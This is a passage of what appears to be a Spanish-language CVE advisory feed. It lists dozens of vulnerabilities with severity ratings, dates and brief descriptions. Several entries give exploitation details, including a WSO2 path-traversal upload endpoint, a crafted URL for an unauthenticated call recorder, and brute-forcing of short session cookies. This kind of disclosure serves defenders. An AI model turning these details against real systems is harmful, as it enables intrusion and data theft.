    Fecha de última actualización: 08/08/2023
    Un control de acceso incorrecto en el directorio de instalación (C:\RailsInstaller) de Rubyinstaller2 versiones v3.1.2 y anteriores, permite a atacantes autenticados ejecutar código arbitrario por medio de la sobreescritura de los binarios ubicados en el directorio
  • CVE-2022-26330
    Severidad: Pendiente de análisis
    Fecha de publicación: 31/08/2022
    Fecha de última actualización: 08/08/2023
    Se han identificado posibles vulnerabilidades en Micro Focus ArcSight Logger. Las vulnerabilidades podrían explotarse de forma remota, resultando en una Divulgación de Información o ataques de tipo Cross-Site Scripting (XSS) propios. Este problema afecta a: Micro Focus ArcSight Logger versiones anteriores a v7.2.2 y versiones anteriores
  • CVE-2022-36562
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso incorrecto en el directorio de instalación (C:\Ruby31-x64) de Rubyinstaller2 versiones v3.1.2 y anteriores, permite a atacantes autenticados ejecutar código arbitrario por medio de la sobreescritura de los binarios ubicados en el directorio
  • CVE-2022-37149
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que WAVLINK WL-WN575A3 versión RPT75A3.V4300.201217, contiene una vulnerabilidad de inyección de comandos cuando opera el archivo adm.cgi. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio del parámetro username
  • CVE-2022-22069
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/09/2022
    Fecha de última actualización: 08/08/2023
    Los dispositivos con la protección del teclado deshabilitada pueden almacenar el cuadro de claves sin cifrar en RPMB y causar un problema criptográfico en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables
  • CVE-2022-22070
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/09/2022
    Fecha de última actualización: 08/08/2023
    Una corrupción de la memoria en el audio debido a una falta de comprobación de la dirección de enrutamiento no válida en la tabla de enrutamiento APR en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables
  • CVE-2022-22080
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/09/2022
    Fecha de última actualización: 08/08/2023
    Una comprobación inapropiada del identificador de backend en el proceso de enrutamiento de PCM puede conllevar a una corrupción de la memoria en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music
  • CVE-2021-44150
    Severidad: MEDIA
    Fecha de publicación: 22/11/2021
    Fecha de última actualización: 08/08/2023
    El cliente de tusdotnet versiones hasta 2.5.0 se basa en SHA-1 para prevenir una falsificación del contenido de los archivos
  • CVE-2021-31556
    Severidad: ALTA
    Fecha de publicación: 12/08/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en la extensión Oauth para MediaWiki versiones hasta 1.35.2. El archivo MWOAuthConsumerSubmitControl.php no asegura que la longitud de una clave RSA encaje en un blob de MySQL.
  • CVE-2021-41322
    Severidad: MEDIA
    Fecha de publicación: 04/10/2021
    Fecha de última actualización: 08/08/2023
    Poly VVX 400/410 versión 5.3.1 permite a los usuarios con pocos privilegios cambiar la contraseña de administrador modificando un parámetro POST a 120 durante el proceso de restablecimiento de la contraseña
  • CVE-2022-36749
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que RPi-Jukebox-RFID versión v2.3.0, contiene una vulnerabilidad de inyección de comandos por medio del componente /htdocs/utils/Files.php. Esta vulnerabilidad es explotado por medio de una carga útil diseñada que es inyectada en el nombre de un archivo cargado
  • CVE-2022-37458
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/09/2022
    Fecha de última actualización: 08/08/2023
    Discourse versiones hasta 2.8.7, permite a administradores enviar invitaciones a direcciones de correo electrónico arbitrarias a un ritmo ilimitado
  • CVE-2022-34371
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/09/2022
    Fecha de última actualización: 08/08/2023
    Dell PowerScale OneFS, versiones 9.0.0 hasta 9.1.0.19, 9.2.1.12, 9.3.0.6 y 9.4.0.3 incluyéndola, contienen una vulnerabilidad de transporte de credenciales sin protección. Un atacante malicioso no privilegiado en la red podría explotar esta vulnerabilidad, conllevando a un compromiso total del sistema
  • CVE-2022-34382
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/09/2022
    Fecha de última actualización: 08/08/2023
    Dell Command Update, Dell Update y Alienware Update versiones anteriores a 4.6.0, contienen una vulnerabilidad de escalada de privilegios local en la configuración del catálogo personalizado. Un usuario local malicioso puede explotar potencialmente esta vulnerabilidad para elevar sus privilegios
  • CVE-2021-40539
    Severidad: ALTA
    Fecha de publicación: 07/09/2021
    Fecha de última actualización: 08/08/2023
    Zoho ManageEngine ADSelfService Plus versiones 6113 y anteriores, es vulnerable a una omisión de autenticación de la API REST con una ejecución de código remota resultante
  • CVE-2021-22005
    Severidad: ALTA
    Fecha de publicación: 23/09/2021
    Fecha de última actualización: 08/08/2023
    vCenter Server contiene una vulnerabilidad de carga de archivos arbitraria en el servicio Analytics. Un actor malicioso con acceso de red al puerto 443 en vCenter Server puede explotar este problema para ejecutar código en vCenter Server cargando un archivo especialmente diseñado
  • CVE-2021-35132
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/09/2022
    Fecha de última actualización: 08/08/2023
    Una escritura fuera de límites en el servicio DSP debido a una comprobación de límites inapropiada para el tamaño del búfer de respuesta en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables
  • CVE-2021-32591
    Severidad: BAJA
    Fecha de publicación: 08/12/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de pasos criptográficos faltantes en la función que cifra las credenciales LDAP y RADIUS de los usuarios en FortiSandbox versiones anteriores a 4.0.1, FortiWeb versiones anteriores a 6.3.12, FortiADC versiones anteriores a 6.2.1, FortiMail 7.0.1 y anteriores puede permitir que un atacante en posesión del almacén de contraseñas comprometa la confidencialidad de los secretos cifrados
  • CVE-2022-22104
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/09/2022
    Fecha de última actualización: 08/08/2023
    Una corrupción de memoria en multimedia debido a una comprobación incorrecta de los mensajes recibidos. en Snapdragon Auto
  • CVE-2021-36718
    Severidad: MEDIA
    Fecha de publicación: 08/12/2021
    Fecha de última actualización: 08/08/2023
    SYNEL - eharmonynew / Synel Reports - El atacante puede entrar en el sistema con credenciales por defecto y exportar un informe del sistema eharmony con datos confidenciales (nombre del empleado, número de identificación del empleado, horas de trabajo, etc) La vulnerabilidad ha sido abordada y corregida en la versión 11. Credenciales por defecto , Error de seguridad , Vulnerabilidad de exposición de datos confidenciales en Synel Reports de SYNEL eharmonynew, Synel Reports permite a un atacante iniciar sesión en el sistema con credenciales por defecto. Este problema afecta a: SYNEL eharmonynew, Synel Reports versión 8.0.2 versión 11 y versiones anteriores
  • CVE-2022-37843
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/09/2022
    Fecha de última actualización: 08/08/2023
    En TOTOLINK A860R versión V4.1.2cu.5182_B20201027 en el archivo cstecgi.cgi, los parámetros adquiridos son introducidos directamente en el sistema para su ejecución sin filtro, resultando en una vulnerabilidad de inyección de comandos.
  • CVE-2022-35847
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de neutralización inapropiada de los elementos especiales usados en el motor de plantillas [CWE-1336] en la interfaz de administración de FortiSOAR versiones 7.2.0, 7.0.0 hasta 7.0.3, 6.4.0 hasta 6.4.4 puede permitir a un atacante remoto y autenticado ejecutar código arbitrario por medio de una carga útil diseñada.
  • CVE-2021-41694
    Severidad: MEDIA
    Fecha de publicación: 09/12/2021
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de Control de Acceso Incorrecto en Premiumdatingscript versión 4.2.7.7, por medio del procedimiento de cambio de contraseña en el archivo requests\user.php
  • CVE-2022-22098
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/09/2022
    Fecha de última actualización: 08/08/2023
    Una corrupción de memoria en el controlador multimedia debido a una desviación de puntero no fiable mientras se leen datos del socket en Snapdragon Auto
  • CVE-2022-22100
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/09/2022
    Fecha de última actualización: 08/08/2023
    Una corrupción de memoria en multimedia debido a una comprobación incorrecta de los descriptores de exportación recibidos en Snapdragon Auto
  • CVE-2022-26451
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/09/2022
    Fecha de última actualización: 08/08/2023
    En ged, se presenta un posible uso de memoria previamente liberada debido a un bloqueo inapropiado. Esto podría conllevar a una escalada de privilegios local con privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS07202966; ID de Incidencia: ALPS07202966.
  • CVE-2022-26450
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/09/2022
    Fecha de última actualización: 08/08/2023
    En apusys, se presenta un posible uso de memoria previamente liberada debido a una condición de carrera. Esto podría conllevar a una escalada de privilegios local con privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS07177801; ID de Incidencia: ALPS07177801.
  • CVE-2022-26447
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/09/2022
    Fecha de última actualización: 08/08/2023
    En BT firmware, es posible que se produzca una escritura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una ejecución de código remota sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS06784478; ID de Incidencia: ALPS06784478.
  • CVE-2022-39196
    Severidad: Pendiente de análisis
    Fecha de publicación: 04/09/2022
    Fecha de última actualización: 08/08/2023
    Blackboard Learn versión 1.10.1, permite a usuarios remotos autenticados leer archivos no deseados al introducir las credenciales de los estudiantes y visitando directamente una determinada URL de webapps/bbcms/execute/
  • CVE-2022-29502
    Severidad: ALTA
    Fecha de publicación: 05/05/2022
    Fecha de última actualización: 08/08/2023
    SchedMD Slurm versiones 21.08.x hasta 20.11.x, presenta un Control de Acceso Incorrecto que conlleva a una Escalada de Privilegios
  • CVE-2022-29464
    Severidad: ALTA
    Fecha de publicación: 18/04/2022
    Fecha de última actualización: 08/08/2023
    Algunos productos WSO2 permiten la carga de archivos sin restricciones con la consiguiente ejecución remota de código. El atacante debe utilizar un endpoint /fileupload con una secuencia de recorrido de directorio Content-Disposition para alcanzar un directorio bajo la raíz web, como un directorio ../../../../repositorio/despliegue/servidor/webapps. Esto afecta a WSO2 API Manager 2.2.0 y superior hasta 4.0.0; WSO2 Identity Server 5.2.0 y superior hasta 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0 y 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 y superior hasta 5.10.0; y WSO2 Enterprise Integrator 6.2.0 y superior hasta 6.6.0
  • CVE-2022-23691
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/09/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad en determinados modelos de switches AOS-CX que podría permitir a un atacante con acceso a la consola de recuperación omitir la autenticación normal. Una explotación con éxito permite a un atacante omitir la autenticación del sistema y lograr el compromiso total del switch en los Switches ArubaOS-CX versión(es): AOS-CX 10.10.xxxx: 10.10.0002 y anteriores, AOS-CX 10.09.xxxx: 10.09.1030 y anteriores, AOS-CX 10.08.xxxx: 10.08.1070 y anteriores, AOS-CX 10.06.xxxx: 10.06.0210 y anteriores. Aruba ha publicado actualizaciones para los dispositivos ArubaOS-CX Switches que abordan esta vulnerabilidad de seguridad.
  • CVE-2021-44151
    Severidad: MEDIA
    Fecha de publicación: 13/12/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Reprise RLM versión 14.2. Como las cookies de sesión son pequeñas, un atacante puede secuestrar cualquier sesión presente forzando la cookie de sesión de 4 caracteres hexadecimales en la versión de Windows (la versión de Linux parece tener 8 caracteres). Un atacante puede obtener la parte estática de la cookie (nombre de la cookie) al hacer primero una petición a cualquier página de la aplicación (por ejemplo, /goforms/menú) y guardando el nombre de la cookie enviada con la respuesta. El atacante puede entonces usar el nombre de la cookie e intentar solicitar esa misma página, estableciendo un valor aleatorio para la cookie. Si algún usuario presenta una sesión activa, la página debería volver con el contenido autorizado, cuando se encuentre un valor de cookie válido
  • CVE-2021-44152
    Severidad: ALTA
    Fecha de publicación: 13/12/2021
    Fecha de última actualización: 02/08/2023
    Se ha detectado un problema en Reprise RLM versión 14.2. Debido a que /goform/change_password_process no verifica la autenticación o la autorización, un usuario no autenticado puede cambiar la contraseña de cualquier usuario presente. Esto permite a un atacante cambiar la contraseña de cualquier usuario conocido, impidiendo así que los usuarios válidos accedan al sistema y concediendo al atacante acceso completo a la cuenta de ese usuario
  • CVE-2021-39940
    Severidad: MEDIA
    Fecha de publicación: 13/12/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab CE/EE afectando a todas las versiones a partir de 13.2 anteriores a 14.3.6, a todas las versiones a partir de 14.4 anteriores a 14.4.4, a todas las versiones a partir de 14.5 anteriores a 14.5.2. El registro de paquetes de GitLab Maven es vulnerable a una denegación de servicio de expresión regular cuando es enviada una cadena específicamente manipulada
  • CVE-2022-37146
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/09/2022
    Fecha de última actualización: 08/08/2023
    La plataforma PlexTrac versiones anteriores a 1.28.0 permite la enumeración de nombres de usuario por medio de tiempos de respuesta HTTP en intentos de inicio de sesión no válidos para usuarios configurados para usar el proveedor de autenticación PlexTrac. Los intentos de inicio de sesión para usuarios desbloqueados válidos configurados para usar PlexTrac como su proveedor de autenticación tardan mucho más que los de usuarios no válidos, lo que permite a un atacante remoto no autenticado enumerar a usuarios válidos. Tenga en cuenta que la política de bloqueo implementada en Plextract versión 1.17.0 hace que sea imposible distinguir entre cuentas de usuario válidas bloqueadas y cuentas de usuario que no existen, pero no impide que se enumeren usuarios válidos desbloqueados
  • CVE-2021-39064
    Severidad: MEDIA
    Fecha de publicación: 13/12/2021
    Fecha de última actualización: 08/08/2023
    IBM Spectrum Copy Data Management versiones 2.2.13 y anteriores, presentan reglas de autenticación y contraseña débiles y manejan incorrectamente las credenciales por defecto para la consola de administración de Spectrum Copy Data Management. IBM X-Force ID: 214957
  • CVE-2022-37163
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/09/2022
    Fecha de última actualización: 08/08/2023
    Bminusl IHateToBudget versión v1.5.7, emplea una política de contraseña débil que permite a atacantes conseguir acceso no autorizado a la aplicación mediante ataques de fuerza bruta. Además, las contraseñas de usuarios son cifradas sin sal ni pimienta, haciendo mucho mas fácil que herramientas como hashcat descifren los hashes
  • CVE-2021-44949
    Severidad: ALTA
    Fecha de publicación: 14/12/2021
    Fecha de última actualización: 08/08/2023
    glFusion CMS versión 1.7.9 está afectado por una vulnerabilidad de control de acceso por medio del archivo /public_html/users.php
  • CVE-2022-22314
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/09/2022
    Fecha de última actualización: 08/08/2023
    IBM Planning Analytics Local versiones 2.0, permite que las páginas web sean almacenadas localmente y que otro usuario del sistema pueda leerlas. IBM X-Force ID: 217371
  • CVE-2021-39933
    Severidad: MEDIA
    Fecha de publicación: 13/12/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab CE/EE afectando a todas las versiones a partir de 12.10 anteriores a 14.3.6, a todas las versiones a partir de 14.4 anteriores a 14.4.4, a todas las versiones a partir de 14.5 anteriores a 14.5.2. Una expresión regular usada para el manejo de la entrada del usuario (notas, comentarios, etc) era susceptible de un retroceso catastrófico que podía causar un ataque DOS
  • CVE-2021-41844
    Severidad: ALTA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    Crocoblock JetEngine versiones anteriores a 2.9.1, no comprueba ni sanea correctamente los datos del formulario
  • CVE-2021-0964
    Severidad: ALTA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    En la función C2SoftMP3::process() del archivo C2SoftMp3Dec.cpp, se presenta una posible escritura fuera de límites debido a un desbordamiento del búfer de la pila. Esto podría conllevar a una divulgación remota de información sin ser necesarios privilegios de ejecución adicionales. Es requerida una interacción del usuario para su explotación. Producto: Android. Versiones: Android-10 Android-11 Android-12 Android-9. ID de Android: A-193363621
  • CVE-2021-0928
    Severidad: ALTA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    En la función createFromParcel del archivo OutputConfiguration.java, se presenta un posible desajuste de serialización/deserialización de paquetes debido a una comprobación de entrada inapropiada. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android. Versiones: Android-10 Android-11 Android-9. ID de Android: A-188675581
  • CVE-2021-0978
    Severidad: BAJA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    En la función getSerialForPackage del archivo DeviceIdentifiersPolicyService.java, se presenta una posible forma de determinar si una aplicación está instalada, sin permisos de consulta, debido a una divulgación de información de canal lateral. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android. Versiones: Android-12. ID de Android: A-192587406
  • CVE-2021-0984
    Severidad: MEDIA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    En la función onNullBinding del archivo ManagedServices.java, se presenta una posible omisión de permisos debido a un servicio incorrectamente desatado. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android. Versiones: Android-12. ID de Android: A-192475653
  • CVE-2021-0933
    Severidad: ALTA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    En la función onCreate del archivo CompanionDeviceActivity.java o DeviceChooserActivity.java, es posible que las etiquetas HTML interfieran con un diálogo de consentimiento debido a una comprobación de entrada inapropiada. Esto podría conllevar a una escalada remota de privilegios, confundiendo al usuario para que acepte el emparejamiento de un dispositivo Bluetooth malicioso, sin ser necesarios privilegios de ejecución adicionales. Es requerida una interacción del usuario para su explotación. Producto: Android. Versiones: Android-10 Android-11 Android-12 Android-9. ID de Android: A-172251622
  • CVE-2021-0986
    Severidad: BAJA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    En la función hasGrantedPolicy del archivo DevicePolicyManagerService.java, se presenta una posible divulgación de información sobre el propietario del dispositivo, el propietario del perfil o el administrador del dispositivo debido a un error lógico en el código. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android. Versiones: Android-12. ID de Android: A-192247339
  • CVE-2021-39646
    Severidad: MEDIA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    Producto: Android. Versiones: Android kernel. ID de Android: A-201537251. Referencias: N/A
  • CVE-2021-42216
    Severidad: ALTA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    Se presenta un algoritmo Criptográfico Roto o Arriesgado en AnonAddy versión 0.8.5, por medio del archivo VerificationController.php
  • CVE-2021-1045
    Severidad: MEDIA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    Producto: Android. Versiones: Android kernel. ID de Android: A-195580473. Referencias: N/A
  • CVE-2021-39640
    Severidad: ALTA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    En la función __dwc3_gadget_ep0_queue del archivo ep0.c, se presenta una posible escritura fuera de límites debido a un bloqueo inapropiado. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android. Versiones: Android kernel. ID de Android: A-157294279. Referencias: N/A
  • CVE-2021-1001
    Severidad: BAJA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    En la función PVInitVideoEncoder del archivo mp4enc_api.cpp, se presenta una posible lectura fuera de límites debido a un desbordamiento del búfer de la pila. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android. Versiones: Android-12. ID de Android: A-190435883
  • CVE-2021-39649
    Severidad: MEDIA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    En la función regmap_exit del archivo regmap.c, se presenta un posible uso de memoria previamente liberada debido a un bloqueo inapropiado. Esto podría conllevar a una escalada local de privilegios en el kernel con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. Producto: Android. Versiones: Android kernel. ID de Android: A-174049006. Referencias: N/A
  • CVE-2021-45097
    Severidad: BAJA
    Fecha de publicación: 16/12/2021
    Fecha de última actualización: 08/08/2023
    KNIME Server versiones anteriores a 4.12.6 y versiones 4.13.x anteriores a 4.13.4 (cuando se instala en modo desatendido) mantiene la contraseña del administrador en un archivo sin los controles de acceso a archivos apropiados, permitiendo a todos los usuarios locales leer su contenido
  • CVE-2021-0674
    Severidad: BAJA
    Fecha de publicación: 17/12/2021
    Fecha de última actualización: 08/08/2023
    En el descodificador alac, se presenta una posible lectura fuera de límites debido a una comprobación de límites incorrecta. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS06064258; ID de Incidencia: ALPS06064237
  • CVE-2021-0676
    Severidad: BAJA
    Fecha de publicación: 17/12/2021
    Fecha de última actualización: 08/08/2023
    En el controlador geniezone, se presenta una posible lectura fuera de límites debido a una comprobación de límites incorrecta. Esto podría conllevar a una divulgación de información local con privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05863009; ID de Incidencia: ALPS05863009
  • CVE-2021-0678
    Severidad: MEDIA
    Fecha de publicación: 17/12/2021
    Fecha de última actualización: 08/08/2023
    En apusys, se presenta una posible escritura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una escalada de privilegios local con privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05672107; ID de Incidencia: ALPS05722511
  • CVE-2021-0679
    Severidad: MEDIA
    Fecha de publicación: 17/12/2021
    Fecha de última actualización: 08/08/2023
    En apusys, se presenta una posible corrupción de memoria debido a una falta de comprobación de límites. Esto podría conllevar a una escalada de privilegios local con privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05672107; ID de Incidencia: ALPS05687781
  • CVE-2021-0895
    Severidad: MEDIA
    Fecha de publicación: 17/12/2021
    Fecha de última actualización: 08/08/2023
    En apusys, se presenta una posible escritura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una escalada de privilegios local con privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05672107; ID de Incidencia: ALPS05672003
  • CVE-2021-0896
    Severidad: MEDIA
    Fecha de publicación: 17/12/2021
    Fecha de última actualización: 08/08/2023
    En apusys, se presenta una posible escritura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una escalada de privilegios local con privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05672107; ID de Incidencia: ALPS05671206
  • CVE-2021-0900
    Severidad: BAJA
    Fecha de publicación: 17/12/2021
    Fecha de última actualización: 08/08/2023
    En apusys, se presenta una posible lectura fuera de límites debido a una comprobación de límites incorrecta. Esto podría conllevar a una divulgación de información local con privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05672107; ID de Incidencia: ALPS05672055
  • CVE-2021-0902
    Severidad: BAJA
    Fecha de publicación: 17/12/2021
    Fecha de última actualización: 08/08/2023
    En apusys, se presenta una posible lectura fuera de límites debido a una comprobación de límites incorrecta. Esto podría conllevar a una divulgación de información local con privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05672107; ID de Incidencia: ALPS05656484
  • CVE-2021-0903
    Severidad: MEDIA
    Fecha de publicación: 17/12/2021
    Fecha de última actualización: 08/08/2023
    En apusys, se presenta una posible escritura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una escalada de privilegios local con privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05672107; ID de Incidencia: ALPS05656488
  • CVE-2021-45101
    Severidad: MEDIA
    Fecha de publicación: 16/12/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en HTCondor versiones anteriores a versión 8.8.15, versiones 9.0.x anteriores a 9.0.4 y versiones 9.1.x anteriores a 9.1.2. Usando herramientas de línea de comandos estándar, un usuario con sólo acceso de LECTURA a un demonio HTCondor SchedD o Collector puede detectar secretos que podrían permitirle controlar los trabajos de otros usuarios y/o leer sus datos
  • CVE-2021-30983
    Severidad: ALTA
    Fecha de publicación: 24/08/2021
    Fecha de última actualización: 08/08/2023
    Se solucionó un problema de desbordamiento del búfer con una administración de la memoria mejorada. Este problema se solucionó en iOS versión 15.2 e iPadOS versión 15.2. Una aplicación puede ejecutar código arbitrario con privilegios del kernel
  • CVE-2021-30966
    Severidad: MEDIA
    Fecha de publicación: 24/08/2021
    Fecha de última actualización: 08/08/2023
    Se abordó un problema lógico con una administración de estado mejorada. Este problema es corregido en macOS Monterey versión 12.1, watchOS versión 8.3, iOS versión 15.2 e iPadOS versión 15.2, tvOS versión 15.2. El tráfico de usuarios puede filtrarse no esperadamente a un servidor proxy a pesar de las configuraciones de PAC
  • CVE-2021-30988
    Severidad: MEDIA
    Fecha de publicación: 24/08/2021
    Fecha de última actualización: 08/08/2023
    Descripción: se solucionó un problema de permisos con una comprobación mejorada. Este problema se solucionó en iOS versión 15.2 e iPadOS versión 15.2. Una aplicación maliciosa puede identificar qué otras aplicaciones ha instalado un usuario
  • CVE-2021-30947
    Severidad: MEDIA
    Fecha de publicación: 24/08/2021
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de acceso con restricciones adicionales del sandbox. Este problema es corregido en macOS Big Sur versión 11.6.2, tvOS versión 15.2, macOS Monterey versión 12.1, iOS versión 15.2 e iPadOS versión 15.2, watchOS versión 8.3. Una aplicación puede acceder a los archivos de un usuario
  • CVE-2021-45470
    Severidad: MEDIA
    Fecha de publicación: 23/12/2021
    Fecha de última actualización: 08/08/2023
    El archivo lib/DatabaseLayer.py en cve-search versiones anteriores a 4.1.0, permite una inyección de expresiones regulares, que puede conllevar a ReDoS (denegación de servicio por expresiones regulares) u otros impactos
  • CVE-2021-45289
    Severidad: MEDIA
    Fecha de publicación: 21/12/2021
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad en GPAC 1.0.1, debido a una omisión de información relevante para la seguridad, que podría causar una denegación de servicio. El programa termina con la señal SIGKILL
  • CVE-2022-38400
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/09/2022
    Fecha de última actualización: 08/08/2023
    Mailform Pro CGI versiones 4.3.1 y anteriores permiten a un atacante remoto no autenticado obtener los datos de entrada del usuario utilizando el producto para acceder a una URL especialmente diseñada
  • CVE-2022-37857
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/09/2022
    Fecha de última actualización: 08/08/2023
    bilde2910 Hauk versión v1.6.1, requiere una contraseña embebida que, de forma predeterminada, está en blanco. Esta contraseña embebida está cifrada, pero es almacenada en el lado del servidor del archivo config.php, así como en texto sin cifrar en el dispositivo cliente de Android de forma predeterminada
  • CVE-2022-37164
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/09/2022
    Fecha de última actualización: 08/08/2023
    Inoda OnTrack versión v3.4, emplea una política de contraseña débil que permite a atacantes conseguir acceso no autorizado a la aplicación mediante ataques de fuerza bruta. Además, las contraseñas de usuarios son cifradas sin sal ni pimienta, lo que facilita mucho que herramientas como hashcat descifren los hashes
  • CVE-2022-38399
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/09/2022
    Fecha de última actualización: 08/08/2023
    Una falta en el mecanismo de protección para la interfaz de hardware alternativa en SmaCam CS-QR10 todas las versiones y SmaCam Night Vision CS-QR20 todas las versiones permite a un atacante ejecutar un comando arbitrario del Sistema Operativo al hacer que el producto se conecte a la conexión en serie específica del producto
  • CVE-2022-33941
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/09/2022
    Fecha de última actualización: 08/08/2023
    La API PowerCMS XMLRPC proporcionada por Alfasado Inc. presenta una vulnerabilidad de inyección de comandos. El envío de un mensaje especialmente diseñado mediante el método POST a la API XMLRPC de PowerCMS puede permitir la ejecución arbitraria de secuencias de comandos Perl y un comando arbitrario del Sistema Operativo puede ser ejecutado por medio de él. Los productos/versiones afectados son los siguientes: PowerCMS versiones 6.021 y anteriores (PowerCMS 6 Series), PowerCMS 5.21 y anteriores (PowerCMS 5 Series) y PowerCMS versiones 4.51 y anteriores (PowerCMS 4 Series). Tenga en cuenta que todas las versiones de PowerCMS versiones 3 Series y anteriores que no son compatibles (fin de vida útil, EOL) también están afectadas por esta vulnerabilidad
  • CVE-2022-36780
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Avdor CIS - crystal quality. Errores de Administración de Credenciales. El producto es un grabador de llamadas telefónicas, pueden escucharse todas las llamadas grabadas sin autenticarse en el sistema. El atacante envía una URL diseñada al sistema: ip:port//V=2;ChannellD=number;Ext=number;Command=startLM;Client=number;Request=number;R=number number - id del número grabado
  • CVE-2022-22330
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
